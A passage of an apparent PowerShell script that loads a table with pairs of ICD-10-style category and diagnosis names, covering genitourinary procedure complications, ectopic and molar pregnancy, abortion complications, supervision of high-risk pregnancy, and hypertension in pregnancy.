$DiagnosisList.Rows.Add("Complication of continent stoma of urinary tract","Hemorrhage of continent stoma of urinary tract") + $null = $DiagnosisList.Rows.Add("Complication of continent stoma of urinary tract","Infection of continent stoma of urinary tract") + $null = $DiagnosisList.Rows.Add("Complication of continent stoma of urinary tract","Malfunction of continent stoma of urinary tract") + $null = $DiagnosisList.Rows.Add("Complication of continent stoma of urinary tract","Herniation of continent stoma of urinary tract") + $null = $DiagnosisList.Rows.Add("Complication of continent stoma of urinary tract","Stenosis of continent stoma of urinary tract") + $null = $DiagnosisList.Rows.Add("Complication of continent stoma of urinary tract","Other complication of continent stoma of urinary tract") + $null = $DiagnosisList.Rows.Add("Intraoperative hemorrhage and hematoma of a genitourinary system organ or structure complicating a procedure","Intraoperative hemorrhage and hematoma of a genitourinary system organ or structure complicating a genitourinary system procedure") + $null = $DiagnosisList.Rows.Add("Intraoperative hemorrhage and hematoma of a genitourinary system organ or structure complicating a procedure","Intraoperative hemorrhage and hematoma of a genitourinary system organ or structure complicating other procedure") + $null = $DiagnosisList.Rows.Add("Accidental puncture and laceration of a genitourinary system organ or structure during a procedure","Accidental puncture and laceration of a genitourinary system organ or structure during a genitourinary system procedure") + $null = $DiagnosisList.Rows.Add("Accidental puncture and laceration of a genitourinary system organ or structure during a procedure","Accidental puncture and laceration of a genitourinary system organ or structure during other procedure") + $null = $DiagnosisList.Rows.Add("Other intraoperative and postprocedural complications and disorders of genitourinary system","Other intraoperative complications of genitourinary system") + $null = $DiagnosisList.Rows.Add("Postprocedural hemorrhage of a genitourinary system organ or structure following a procedure","Postprocedural hemorrhage of a genitourinary system organ or structure following a genitourinary system procedure") + $null = $DiagnosisList.Rows.Add("Postprocedural hemorrhage of a genitourinary system organ or structure following a procedure","Postprocedural hemorrhage of a genitourinary system organ or structure following other procedure") + $null = $DiagnosisList.Rows.Add("Residual ovary syndrome","Residual ovary syndrome") + $null = $DiagnosisList.Rows.Add("Postprocedural hematoma and seroma of a genitourinary system organ or structure following a procedure","Postprocedural hematoma of a genitourinary system organ or structure following a genitourinary system procedure") + $null = $DiagnosisList.Rows.Add("Postprocedural hematoma and seroma of a genitourinary system organ or structure following a procedure","Postprocedural hematoma of a genitourinary system organ or structure following other procedure") + $null = $DiagnosisList.Rows.Add("Postprocedural hematoma and seroma of a genitourinary system organ or structure following a procedure","Postprocedural seroma of a genitourinary system organ or structure following a genitourinary system procedure") + $null = $DiagnosisList.Rows.Add("Postprocedural hematoma and seroma of a genitourinary system organ or structure following a procedure","Postprocedural seroma of a genitourinary system organ or structure following other procedure") + $null = $DiagnosisList.Rows.Add("Other postprocedural complications and disorders of genitourinary system","Other postprocedural complications and disorders of genitourinary system") + $null = $DiagnosisList.Rows.Add("Abdominal pregnancy","Abdominal pregnancy without intrauterine pregnancy") + $null = $DiagnosisList.Rows.Add("Abdominal pregnancy","Abdominal pregnancy with intrauterine pregnancy") + $null = $DiagnosisList.Rows.Add("Tubal pregnancy without intrauterine pregnancy","Right tubal pregnancy without intrauterine pregnancy") + $null = $DiagnosisList.Rows.Add("Tubal pregnancy without intrauterine pregnancy","Left tubal pregnancy without intrauterine pregnancy") + $null = $DiagnosisList.Rows.Add("Tubal pregnancy without intrauterine pregnancy","Unspecified tubal pregnancy without intrauterine pregnancy") + $null = $DiagnosisList.Rows.Add("Tubal pregnancy with intrauterine pregnancy","Right tubal pregnancy with intrauterine pregnancy") + $null = $DiagnosisList.Rows.Add("Tubal pregnancy with intrauterine pregnancy","Left tubal pregnancy with intrauterine pregnancy") + $null = $DiagnosisList.Rows.Add("Tubal pregnancy with intrauterine pregnancy","Unspecified tubal pregnancy with intrauterine pregnancy") + $null = $DiagnosisList.Rows.Add("Ovarian pregnancy without intrauterine pregnancy","Right ovarian pregnancy without intrauterine pregnancy") + $null = $DiagnosisList.Rows.Add("Ovarian pregnancy without intrauterine pregnancy","Left ovarian pregnancy without intrauterine pregnancy") + $null = $DiagnosisList.Rows.Add("Ovarian pregnancy without intrauterine pregnancy","Unspecified ovarian pregnancy without intrauterine pregnancy") + $null = $DiagnosisList.Rows.Add("Ovarian pregnancy with intrauterine pregnancy","Right ovarian pregnancy with intrauterine pregnancy") + $null = $DiagnosisList.Rows.Add("Ovarian pregnancy with intrauterine pregnancy","Left ovarian pregnancy without intrauterine pregnancy") + $null = $DiagnosisList.Rows.Add("Ovarian pregnancy with intrauterine pregnancy","Unspecified ovarian pregnancy with intrauterine pregnancy") + $null = $DiagnosisList.Rows.Add("Other ectopic pregnancy","Other ectopic pregnancy without intrauterine pregnancy") + $null = $DiagnosisList.Rows.Add("Other ectopic pregnancy","Other ectopic pregnancy with intrauterine pregnancy") + $null = $DiagnosisList.Rows.Add("Ectopic pregnancy, unspecified","Unspecified ectopic pregnancy without intrauterine pregnancy") + $null = $DiagnosisList.Rows.Add("Ectopic pregnancy, unspecified","Unspecified ectopic pregnancy with intrauterine pregnancy") + $null = $DiagnosisList.Rows.Add("Hydatidiform mole","Classical hydatidiform mole") + $null = $DiagnosisList.Rows.Add("Hydatidiform mole","Incomplete and partial hydatidiform mole") + $null = $DiagnosisList.Rows.Add("Hydatidiform mole","Hydatidiform mole, unspecified") + $null = $DiagnosisList.Rows.Add("Other abnormal products of conception","Blighted ovum and nonhydatidiform mole") + $null = $DiagnosisList.Rows.Add("Other abnormal products of conception","Missed abortion") + $null = $DiagnosisList.Rows.Add("Other specified abnormal products of conception","Inappropriate change in quantitative human chorionic gonadotropin (hCG) in early pregnancy") + $null = $DiagnosisList.Rows.Add("Other specified abnormal products of conception","Other abnormal products of conception") + $null = $DiagnosisList.Rows.Add("Abnormal product of conception, unspecified","Abnormal product of conception, unspecified") + $null = $DiagnosisList.Rows.Add("Spontaneous abortion","Genital tract and pelvic infection following incomplete spontaneous abortion") + $null = $DiagnosisList.Rows.Add("Spontaneous abortion","Delayed or excessive hemorrhage following incomplete spontaneous abortion") + $null = $DiagnosisList.Rows.Add("Spontaneous abortion","Embolism following incomplete spontaneous abortion") + $null = $DiagnosisList.Rows.Add("Other and unspecified complications following incomplete spontaneous abortion","Unspecified complication following incomplete spontaneous abortion") + $null = $DiagnosisList.Rows.Add("Other and unspecified complications following incomplete spontaneous abortion","Shock following incomplete spontaneous abortion") + $null = $DiagnosisList.Rows.Add("Other and unspecified complications following incomplete spontaneous abortion","Renal failure following incomplete spontaneous abortion") + $null = $DiagnosisList.Rows.Add("Other and unspecified complications following incomplete spontaneous abortion","Metabolic disorder following incomplete spontaneous abortion") + $null = $DiagnosisList.Rows.Add("Other and unspecified complications following incomplete spontaneous abortion","Damage to pelvic organs following incomplete spontaneous abortion") + $null = $DiagnosisList.Rows.Add("Other and unspecified complications following incomplete spontaneous abortion","Other venous complications following incomplete spontaneous abortion") + $null = $DiagnosisList.Rows.Add("Other and unspecified complications following incomplete spontaneous abortion","Cardiac arrest following incomplete spontaneous abortion") + $null = $DiagnosisList.Rows.Add("Other and unspecified complications following incomplete spontaneous abortion","Sepsis following incomplete spontaneous abortion") + $null = $DiagnosisList.Rows.Add("Other and unspecified complications following incomplete spontaneous abortion","Urinary tract infection following incomplete spontaneous abortion") + $null = $DiagnosisList.Rows.Add("Other and unspecified complications following incomplete spontaneous abortion","Incomplete spontaneous abortion with other complications") + $null = $DiagnosisList.Rows.Add("Incomplete spontaneous abortion without complication","Incomplete spontaneous abortion without complication") + $null = $DiagnosisList.Rows.Add("Genital tract and pelvic infection following complete or unspecified spontaneous abortion","Genital tract and pelvic infection following complete or unspecified spontaneous abortion") + $null = $DiagnosisList.Rows.Add("Delayed or excessive hemorrhage following complete or unspecified spontaneous abortion","Delayed or excessive hemorrhage following complete or unspecified spontaneous abortion") + $null = $DiagnosisList.Rows.Add("Embolism following complete or unspecified spontaneous abortion","Embolism following complete or unspecified spontaneous abortion") + $null = $DiagnosisList.Rows.Add("Other and unspecified complications following complete or unspecified spontaneous abortion","Unspecified complication following complete or unspecified spontaneous abortion") + $null = $DiagnosisList.Rows.Add("Other and unspecified complications following complete or unspecified spontaneous abortion","Shock following complete or unspecified spontaneous abortion") + $null = $DiagnosisList.Rows.Add("Other and unspecified complications following complete or unspecified spontaneous abortion","Renal failure following complete or unspecified spontaneous abortion") + $null = $DiagnosisList.Rows.Add("Other and unspecified complications following complete or unspecified spontaneous abortion","Metabolic disorder following complete or unspecified spontaneous abortion") + $null = $DiagnosisList.Rows.Add("Other and unspecified complications following complete or unspecified spontaneous abortion","Damage to pelvic organs following complete or unspecified spontaneous abortion") + $null = $DiagnosisList.Rows.Add("Other and unspecified complications following complete or unspecified spontaneous abortion","Other venous complications following complete or unspecified spontaneous abortion") + $null = $DiagnosisList.Rows.Add("Other and unspecified complications following complete or unspecified spontaneous abortion","Cardiac arrest following complete or unspecified spontaneous abortion") + $null = $DiagnosisList.Rows.Add("Other and unspecified complications following complete or unspecified spontaneous abortion","Sepsis following complete or unspecified spontaneous abortion") + $null = $DiagnosisList.Rows.Add("Other and unspecified complications following complete or unspecified spontaneous abortion","Urinary tract infection following complete or unspecified spontaneous abortion") + $null = $DiagnosisList.Rows.Add("Other and unspecified complications following complete or unspecified spontaneous abortion","Complete or unspecified spontaneous abortion with other complications") + $null = $DiagnosisList.Rows.Add("Complete or unspecified spontaneous abortion without complication","Complete or unspecified spontaneous abortion without complication") + $null = $DiagnosisList.Rows.Add("Complications following (induced) termination of pregnancy","Genital tract and pelvic infection following (induced) termination of pregnancy") + $null = $DiagnosisList.Rows.Add("Complications following (induced) termination of pregnancy","Delayed or excessive hemorrhage following (induced) termination of pregnancy") + $null = $DiagnosisList.Rows.Add("Complications following (induced) termination of pregnancy","Embolism following (induced) termination of pregnancy") + $null = $DiagnosisList.Rows.Add("(Induced) termination of pregnancy with other and unspecified complications","(Induced) termination of pregnancy with unspecified complications") + $null = $DiagnosisList.Rows.Add("(Induced) termination of pregnancy with other and unspecified complications","Shock following (induced) termination of pregnancy") + $null = $DiagnosisList.Rows.Add("(Induced) termination of pregnancy with other and unspecified complications","Renal failure following (induced) termination of pregnancy") + $null = $DiagnosisList.Rows.Add("(Induced) termination of pregnancy with other and unspecified complications","Metabolic disorder following (induced) termination of pregnancy") + $null = $DiagnosisList.Rows.Add("(Induced) termination of pregnancy with other and unspecified complications","Damage to pelvic organs following (induced) termination of pregnancy") + $null = $DiagnosisList.Rows.Add("(Induced) termination of pregnancy with other and unspecified complications","Other venous complications following (induced) termination of pregnancy") + $null = $DiagnosisList.Rows.Add("(Induced) termination of pregnancy with other and unspecified complications","Cardiac arrest following (induced) termination of pregnancy") + $null = $DiagnosisList.Rows.Add("(Induced) termination of pregnancy with other and unspecified complications","Sepsis following (induced) termination of pregnancy") + $null = $DiagnosisList.Rows.Add("(Induced) termination of pregnancy with other and unspecified complications","Urinary tract infection following (induced) termination of pregnancy") + $null = $DiagnosisList.Rows.Add("(Induced) termination of pregnancy with other and unspecified complications","(Induced) termination of pregnancy with other complications") + $null = $DiagnosisList.Rows.Add("Failed attempted termination of pregnancy","Genital tract and pelvic infection following failed attempted termination of pregnancy") + $null = $DiagnosisList.Rows.Add("Failed attempted termination of pregnancy","Delayed or excessive hemorrhage following failed attempted termination of pregnancy") + $null = $DiagnosisList.Rows.Add("Failed attempted termination of pregnancy","Embolism following failed attempted termination of pregnancy") + $null = $DiagnosisList.Rows.Add("Failed attempted termination of pregnancy with other and unspecified complications","Failed attempted termination of pregnancy with unspecified complications") + $null = $DiagnosisList.Rows.Add("Failed attempted termination of pregnancy with other and unspecified complications","Shock following failed attempted termination of pregnancy") + $null = $DiagnosisList.Rows.Add("Failed attempted termination of pregnancy with other and unspecified complications","Renal failure following failed attempted termination of pregnancy") + $null = $DiagnosisList.Rows.Add("Failed attempted termination of pregnancy with other and unspecified complications","Metabolic disorder following failed attempted termination of pregnancy") + $null = $DiagnosisList.Rows.Add("Failed attempted termination of pregnancy with other and unspecified complications","Damage to pelvic organs following failed attempted termination of pregnancy") + $null = $DiagnosisList.Rows.Add("Failed attempted termination of pregnancy with other and unspecified complications","Other venous complications following failed attempted termination of pregnancy") + $null = $DiagnosisList.Rows.Add("Failed attempted termination of pregnancy with other and unspecified complications","Cardiac arrest following failed attempted termination of pregnancy") + $null = $DiagnosisList.Rows.Add("Failed attempted termination of pregnancy with other and unspecified complications","Sepsis following failed attempted termination of pregnancy") + $null = $DiagnosisList.Rows.Add("Failed attempted termination of pregnancy with other and unspecified complications","Urinary tract infection following failed attempted termination of pregnancy") + $null = $DiagnosisList.Rows.Add("Failed attempted termination of pregnancy with other and unspecified complications","Failed attempted termination of pregnancy with other complications") + $null = $DiagnosisList.Rows.Add("Failed attempted termination of pregnancy without complication","Failed attempted termination of pregnancy without complication") + $null = $DiagnosisList.Rows.Add("Complications following ectopic and molar pregnancy","Genital tract and pelvic infection following ectopic and molar pregnancy") + $null = $DiagnosisList.Rows.Add("Complications following ectopic and molar pregnancy","Delayed or excessive hemorrhage following ectopic and molar pregnancy") + $null = $DiagnosisList.Rows.Add("Complications following ectopic and molar pregnancy","Embolism following ectopic and molar pregnancy") + $null = $DiagnosisList.Rows.Add("Complications following ectopic and molar pregnancy","Shock following ectopic and molar pregnancy") + $null = $DiagnosisList.Rows.Add("Complications following ectopic and molar pregnancy","Renal failure following ectopic and molar pregnancy") + $null = $DiagnosisList.Rows.Add("Complications following ectopic and molar pregnancy","Metabolic disorders following an ectopic and molar pregnancy") + $null = $DiagnosisList.Rows.Add("Complications following ectopic and molar pregnancy","Damage to pelvic organs and tissues following an ectopic and molar pregnancy") + $null = $DiagnosisList.Rows.Add("Complications following ectopic and molar pregnancy","Other venous complications following an ectopic and molar pregnancy") + $null = $DiagnosisList.Rows.Add("Other complications following an ectopic and molar pregnancy","Cardiac arrest following an ectopic and molar pregnancy") + $null = $DiagnosisList.Rows.Add("Other complications following an ectopic and molar pregnancy","Sepsis following ectopic and molar pregnancy") + $null = $DiagnosisList.Rows.Add("Other complications following an ectopic and molar pregnancy","Urinary tract infection following an ectopic and molar pregnancy") + $null = $DiagnosisList.Rows.Add("Other complications following an ectopic and molar pregnancy","Other complications following an ectopic and molar pregnancy") + $null = $DiagnosisList.Rows.Add("Unspecified complication following an ectopic and molar pregnancy","Unspecified complication following an ectopic and molar pregnancy") + $null = $DiagnosisList.Rows.Add("Supervision of pregnancy with history of infertility","Supervision of pregnancy with history of infertility, unspecified trimester") + $null = $DiagnosisList.Rows.Add("Supervision of pregnancy with history of infertility","Supervision of pregnancy with history of infertility, first trimester") + $null = $DiagnosisList.Rows.Add("Supervision of pregnancy with history of infertility","Supervision of pregnancy with history of infertility, second trimester") + $null = $DiagnosisList.Rows.Add("Supervision of pregnancy with history of infertility","Supervision of pregnancy with history of infertility, third trimester") + $null = $DiagnosisList.Rows.Add("Supervision of pregnancy with history of ectopic pregnancy","Supervision of pregnancy with history of ectopic pregnancy, unspecified trimester") + $null = $DiagnosisList.Rows.Add("Supervision of pregnancy with history of ectopic pregnancy","Supervision of pregnancy with history of ectopic pregnancy, first trimester") + $null = $DiagnosisList.Rows.Add("Supervision of pregnancy with history of ectopic pregnancy","Supervision of pregnancy with history of ectopic pregnancy, second trimester") + $null = $DiagnosisList.Rows.Add("Supervision of pregnancy with history of ectopic pregnancy","Supervision of pregnancy with history of ectopic pregnancy, third trimester") + $null = $DiagnosisList.Rows.Add("Supervision of pregnancy with history of molar pregnancy","Supervision of pregnancy with history of molar pregnancy, unspecified trimester") + $null = $DiagnosisList.Rows.Add("Supervision of pregnancy with history of molar pregnancy","Supervision of pregnancy with history of molar pregnancy, first trimester") + $null = $DiagnosisList.Rows.Add("Supervision of pregnancy with history of molar pregnancy","Supervision of pregnancy with history of molar pregnancy, second trimester") + $null = $DiagnosisList.Rows.Add("Supervision of pregnancy with history of molar pregnancy","Supervision of pregnancy with history of molar pregnancy, third trimester") + $null = $DiagnosisList.Rows.Add("Supervision of pregnancy with history of pre-term labor","Supervision of pregnancy with history of pre-term labor, first trimester") + $null = $DiagnosisList.Rows.Add("Supervision of pregnancy with history of pre-term labor","Supervision of pregnancy with history of pre-term labor, second trimester") + $null = $DiagnosisList.Rows.Add("Supervision of pregnancy with history of pre-term labor","Supervision of pregnancy with history of pre-term labor, third trimester") + $null = $DiagnosisList.Rows.Add("Supervision of pregnancy with history of pre-term labor","Supervision of pregnancy with history of pre-term labor, unspecified trimester") + $null = $DiagnosisList.Rows.Add("Supervision of pregnancy with other poor reproductive or obstetric history","Supervision of pregnancy with other poor reproductive or obstetric history, first trimester") + $null = $DiagnosisList.Rows.Add("Supervision of pregnancy with other poor reproductive or obstetric history","Supervision of pregnancy with other poor reproductive or obstetric history, second trimester") + $null = $DiagnosisList.Rows.Add("Supervision of pregnancy with other poor reproductive or obstetric history","Supervision of pregnancy with other poor reproductive or obstetric history, third trimester") + $null = $DiagnosisList.Rows.Add("Supervision of pregnancy with other poor reproductive or obstetric history","Supervision of pregnancy with other poor reproductive or obstetric history, unspecified trimester") + $null = $DiagnosisList.Rows.Add("Supervision of pregnancy with insufficient antenatal care","Supervision of pregnancy with insufficient antenatal care, unspecified trimester") + $null = $DiagnosisList.Rows.Add("Supervision of pregnancy with insufficient antenatal care","Supervision of pregnancy with insufficient antenatal care, first trimester") + $null = $DiagnosisList.Rows.Add("Supervision of pregnancy with insufficient antenatal care","Supervision of pregnancy with insufficient antenatal care, second trimester") + $null = $DiagnosisList.Rows.Add("Supervision of pregnancy with insufficient antenatal care","Supervision of pregnancy with insufficient antenatal care, third trimester") + $null = $DiagnosisList.Rows.Add("Supervision of pregnancy with grand multiparity","Supervision of pregnancy with grand multiparity, unspecified trimester") + $null = $DiagnosisList.Rows.Add("Supervision of pregnancy with grand multiparity","Supervision of pregnancy with grand multiparity, first trimester") + $null = $DiagnosisList.Rows.Add("Supervision of pregnancy with grand multiparity","Supervision of pregnancy with grand multiparity, second trimester") + $null = $DiagnosisList.Rows.Add("Supervision of pregnancy with grand multiparity","Supervision of pregnancy with grand multiparity, third trimester") + $null = $DiagnosisList.Rows.Add("Supervision of elderly primigravida","Supervision of elderly primigravida, first trimester") + $null = $DiagnosisList.Rows.Add("Supervision of elderly primigravida","Supervision of elderly primigravida, second trimester") + $null = $DiagnosisList.Rows.Add("Supervision of elderly primigravida","Supervision of elderly primigravida, third trimester") + $null = $DiagnosisList.Rows.Add("Supervision of elderly primigravida","Supervision of elderly primigravida, unspecified trimester") + $null = $DiagnosisList.Rows.Add("Supervision of elderly multigravida","Supervision of elderly multigravida, first trimester") + $null = $DiagnosisList.Rows.Add("Supervision of elderly multigravida","Supervision of elderly multigravida, second trimester") + $null = $DiagnosisList.Rows.Add("Supervision of elderly multigravida","Supervision of elderly multigravida, third trimester") + $null = $DiagnosisList.Rows.Add("Supervision of elderly multigravida","Supervision of elderly multigravida, unspecified trimester") + $null = $DiagnosisList.Rows.Add("Supervision of young primigravida","Supervision of young primigravida, first trimester") + $null = $DiagnosisList.Rows.Add("Supervision of young primigravida","Supervision of young primigravida, second trimester") + $null = $DiagnosisList.Rows.Add("Supervision of young primigravida","Supervision of young primigravida, third trimester") + $null = $DiagnosisList.Rows.Add("Supervision of young primigravida","Supervision of young primigravida, unspecified trimester") + $null = $DiagnosisList.Rows.Add("Supervision of young multigravida","Supervision of young multigravida, first trimester") + $null = $DiagnosisList.Rows.Add("Supervision of young multigravida","Supervision of young multigravida, second trimester") + $null = $DiagnosisList.Rows.Add("Supervision of young multigravida","Supervision of young multigravida, third trimester") + $null = $DiagnosisList.Rows.Add("Supervision of young multigravida","Supervision of young multigravida, unspecified trimester") + $null = $DiagnosisList.Rows.Add("Supervision of high risk pregnancy due to social problems","Supervision of high risk pregnancy due to social problems, unspecified trimester") + $null = $DiagnosisList.Rows.Add("Supervision of high risk pregnancy due to social problems","Supervision of high risk pregnancy due to social problems, first trimester") + $null = $DiagnosisList.Rows.Add("Supervision of high risk pregnancy due to social problems","Supervision of high risk pregnancy due to social problems, second trimester") + $null = $DiagnosisList.Rows.Add("Supervision of high risk pregnancy due to social problems","Supervision of high risk pregnancy due to social problems, third trimester") + $null = $DiagnosisList.Rows.Add("Supervision of pregnancy resulting from assisted reproductive technology","Supervision of pregnancy resulting from assisted reproductive technology, first trimester") + $null = $DiagnosisList.Rows.Add("Supervision of pregnancy resulting from assisted reproductive technology","Supervision of pregnancy resulting from assisted reproductive technology, second trimester") + $null = $DiagnosisList.Rows.Add("Supervision of pregnancy resulting from assisted reproductive technology","Supervision of pregnancy resulting from assisted reproductive technology, third trimester") + $null = $DiagnosisList.Rows.Add("Supervision of pregnancy resulting from assisted reproductive technology","Supervision of pregnancy resulting from assisted reproductive technology, unspecified trimester") + $null = $DiagnosisList.Rows.Add("Supervision of pregnancy with history of in utero procedure during previous pregnancy","Supervision of pregnancy with history of in utero procedure during previous pregnancy, first trimester") + $null = $DiagnosisList.Rows.Add("Supervision of pregnancy with history of in utero procedure during previous pregnancy","Supervision of pregnancy with history of in utero procedure during previous pregnancy, second trimester") + $null = $DiagnosisList.Rows.Add("Supervision of pregnancy with history of in utero procedure during previous pregnancy","Supervision of pregnancy with history of in utero procedure during previous pregnancy, third trimester") + $null = $DiagnosisList.Rows.Add("Supervision of pregnancy with history of in utero procedure during previous pregnancy","Supervision of pregnancy with history of in utero procedure during previous pregnancy, unspecified trimester") + $null = $DiagnosisList.Rows.Add("Supervision of other high risk pregnancies","Supervision of other high risk pregnancies, first trimester") + $null = $DiagnosisList.Rows.Add("Supervision of other high risk pregnancies","Supervision of other high risk pregnancies, second trimester") + $null = $DiagnosisList.Rows.Add("Supervision of other high risk pregnancies","Supervision of other high risk pregnancies, third trimester") + $null = $DiagnosisList.Rows.Add("Supervision of other high risk pregnancies","Supervision of other high risk pregnancies, unspecified trimester") + $null = $DiagnosisList.Rows.Add("Supervision of high risk pregnancy, unspecified","Supervision of high risk pregnancy, unspecified, unspecified trimester") + $null = $DiagnosisList.Rows.Add("Supervision of high risk pregnancy, unspecified","Supervision of high risk pregnancy, unspecified, first trimester") + $null = $DiagnosisList.Rows.Add("Supervision of high risk pregnancy, unspecified","Supervision of high risk pregnancy, unspecified, second trimester") + $null = $DiagnosisList.Rows.Add("Supervision of high risk pregnancy, unspecified","Supervision of high risk pregnancy, unspecified, third trimester") + $null = $DiagnosisList.Rows.Add("Pre-existing essential hypertension complicating pregnancy,","Pre-existing essential hypertension complicating pregnancy, first trimester") + $null = $DiagnosisList.Rows.Add("Pre-existing essential hypertension complicating pregnancy,","Pre-existing essential hypertension complicating pregnancy, second trimester") + $null = $DiagnosisList.Rows.Add("Pre-existing essential hypertension complicating pregnancy,","Pre-existing essential hypertension complicating pregnancy, third trimester") + $null = $DiagnosisList.Rows.Add("Pre-existing essential hypertension complicating pregnancy,","Pre-existing essential hypertension complicating pregnancy, unspecified trimester") + $null = $DiagnosisList.Rows.Add("Pre-existing essential hypertension complicating childbirth","Pre-existing essential hypertension complicating childbirth") + $null = $DiagnosisList.Rows.Add("Pre-existing essential hypertension complicating the puerperium","Pre-existing essential hypertension complicating the puerperium") + $null = $DiagnosisList.Rows.Add("Pre-existing hypertensive heart disease complicating pregnancy","Pre-existing hypertensive heart disease complicating pregnancy, first trimester") + $null = $DiagnosisList.Rows.Add("Pre-existing hypertensive heart disease complicating pregnancy","Pre-existing hypertensive heart disease complicating pregnancy, second trimester") + $null = $DiagnosisList.Rows.Add("Pre-existing hypertensive heart disease complicating pregnancy","Pre-existing hypertensive heart disease complicating pregnancy, third trimester") + $null = $DiagnosisList.Rows.Add("Pre-existing hypertensive heart disease complicating pregnancy","Pre-existing hypertensive heart disease complicating pregnancy, unspecified trimester") + $null = $DiagnosisList.Rows.Add("Pre-existing hypertensive heart disease complicating childbirth","Pre-existing hypertensive heart disease complicating childbirth") + $null = $DiagnosisList.Rows.Add("Pre-existing hypertensive heart disease complicating the puerperium","Pre-existing hypertensive heart disease complicating the puerperium") + $null = $DiagnosisList.Rows.Add("Pre-existing hypertensive chronic kidney disease complicating pregnancy","Pre-existing hypertensive chronic kidney disease complicating pregnancy, first trimester") + $null = $DiagnosisList.Rows.Add("Pre-existing hypertensive chronic kidney disease complicating pregnancy","Pre-existing hypertensive chronic kidney disease complicating pregnancy, second trimester") + $null = $DiagnosisList.Rows.Add("Pre-existing hypertensive chronic kidney disease complicating pregnancy","Pre-existing hypertensive chronic kidney disease complicating pregnancy, third trimester") + $null = $DiagnosisList.Rows.Add("Pre-existing hypertensive chronic kidney disease complicating pregnancy","Pre-existing hypertensive chronic kidney disease complicating pregnancy, unspecified trimester") + $null = $DiagnosisList.Rows.Add("Pre-existing hypertensive chronic kidney disease complicating childbirth","Pre-existing hypertensive chronic kidney disease complicating childbirth") + $null = $DiagnosisList.Rows.Add("Pre-existing hypertensive chronic kidney disease complicating the puerperium","Pre-existing hypertensive chronic kidney disease complicating the puerperium") + $null = $DiagnosisList.Rows.Add("Pre-existing hypertensive heart and chronic kidney disease complicating pregnancy","Pre-existing hypertensive heart and chronic kidney disease complicating pregnancy, first trimester") + $null = $DiagnosisList.Rows.Add("Pre-existing hypertensive heart and chronic kidney disease complicating pregnancy","Pre-existing hypertensive heart and chronic kidney disease complicating pregnancy, second trimester") + $null = $DiagnosisList.Rows.Add("Pre-existing hypertensive heart and chronic kidney disease complicating pregnancy","Pre-existing hypertensive heart and chronic kidney disease complicating pregnancy, third trimester") + $null = $DiagnosisList.Rows.Add("Pre-existing hypertensive heart and chronic kidney disease complicating pregnancy","Pre-existing hypertensive heart and chronic kidney disease complicating pregnancy, unspecified trimester") + $null = $DiagnosisList.Rows.Add("Pre-existing hypertensive heart and chronic kidney disease complicating childbirth","Pre-existing hypertensive heart and chronic kidney disease complicating childbirth") + $null = $DiagnosisList.Rows.Add("Pre-existing hypertensive heart and chronic kidney disease complicating the puerperium","Pre-existing hypertensive heart and chronic kidney disease complicating the puerperium") + $null = $DiagnosisList.Rows.Add("Pre-existing secondary hypertension complicating pregnancy","Pre-existing secondary hypertension complicating pregnancy, first trimester") + $null = $DiagnosisList.Rows.Add("Pre-existing secondary hypertension complicating pregnancy","Pre-existing secondary hypertension complicating pregnancy, second trimester") + $null = $DiagnosisList.Rows.Add("Pre-existing secondary hypertension complicating pregnancy","Pre-existing secondary hypertension complicating pregnancy, third trimester") + $null = $DiagnosisList.Rows.Add("Pre-existing secondary hypertension complicating pregnancy","Pre-existing secondary hypertension complicating pregnancy, unspecified trimester") + $null = $DiagnosisList.Rows.Add("Pre-existing secondary hypertension complicating childbirth","Pre-existing secondary hypertension complicating childbirth") + $null = $DiagnosisList.Rows.Add("Pre-existing secondary hypertension complicating the puerperium","Pre-existing secondary hypertension complicating the puerperium") + $null = $DiagnosisList.Rows.Add("Unspecified pre-existing hypertension complicating pregnancy","Unspecified pre-existing hypertension complicating pregnancy, first trimester") + $null = $DiagnosisList.Rows.Add("Unspecified pre-existing hypertension complicating pregnancy","Unspecified pre-existing hypertension complicating pregnancy, second trimester") + $null = $DiagnosisList.Rows.Add("Unspecified pre-existing hypertension complicating pregnancy","Unspecified pre-existing hypertension complicating pregnancy, third trimester") + $null = $DiagnosisList.Rows.Add("Unspecified pre-existing hypertension complicating pregnancy","Unspecified pre-existing hypertension complicating pregnancy, unspecified trimester") + $null = $DiagnosisList.Rows.Add("Unspecified pre-existing hypertension complicating childbirth","Unspecified pre-existing hypertension complicating childbirth") + $null = $DiagnosisList.Rows.Add("Unspecified pre-existing hypertension complicating the puerperium","Unspecified pre-existing hypertension complicating the puerperium") + $null = $DiagnosisList.Rows.Add("Pre-existing hypertension with pre-eclampsia","Pre-existing hypertension with pre-eclampsia, first trimester") + $null = $DiagnosisList.Rows.Add("Pre-existing hypertension with pre-eclampsia","Pre-existing hypertension with pre-eclampsia, second trimester") + $null = $DiagnosisList.Rows.Add("Pre-existing hypertension with pre-eclampsia","Pre-existing hypertension with pre-eclampsia, third trimester") + $null = $DiagnosisList.Rows.Add("Pre-existing hypertension with pre-eclampsia","Pre-existing hypertension with pre-eclampsia, complicating childbirth") + $null = $DiagnosisList.Rows.Add("Pre-existing hypertension with pre-eclampsia","Pre-existing hypertension with pre-eclampsia, complicating the puerperium") + $null = $DiagnosisList.Rows.Add("Pre-existing hypertension with pre-eclampsia","Pre-existing hypertension with pre-eclampsia, unspecified trimester") + $null = $DiagnosisList.Rows.Add("Gestational edema","Gestational edema, unspecified trimester") + $null = $DiagnosisList.Rows.Add("Gestational edema","Gestational edema, first trimester") + $null = $DiagnosisList.Rows.Add("Gestational edema","Gestational edema, second trimester") + $null = $DiagnosisList.Rows.Add("Gestational edema","Gestational edema, third trimester") + $null = $DiagnosisList.Rows.Add("Gestational edema","Gestational edema, complicating childbirth") + $null = $DiagnosisList.Rows.Add("Gestational edema","Gestational edema, complicating the puerperium") + $null = $DiagnosisList.Rows.Add("Gestational proteinuria","Gestational proteinuria, unspecified trimester") + $null = $DiagnosisList.Rows.Add("Gestational proteinuria","Gestational proteinuria, first trimester") + $null = $DiagnosisList.Rows.Add("Gestational proteinuria","Gestational proteinuria, second trimester") + $null = $DiagnosisList.Rows.Add("Gestational proteinuria","Gestational proteinuria, third trimester") + $null = $DiagnosisList.Rows.Add("Gestational proteinuria","Gestational proteinuria, complicating childbirth") + $null = $DiagnosisList.Rows.Add("Gestational proteinuria","Gestational proteinuria, complicating the puerperium") + $null = $DiagnosisList.Rows.Add("Gestational edema with proteinuria","Gestational edema with proteinuria, unspecified trimester") + $null = $DiagnosisList.Rows.Add("Gestational edema with proteinuria","Gestational edema with proteinuria, first trimester") + $null = $DiagnosisList.Rows.Add("Gestational edema with proteinuria","Gestational edema with proteinuria, second trimester") + $null = $DiagnosisList.Rows.Add("Gestational edema with proteinuria","Gestational edema with proteinuria, third trimester") + $null = 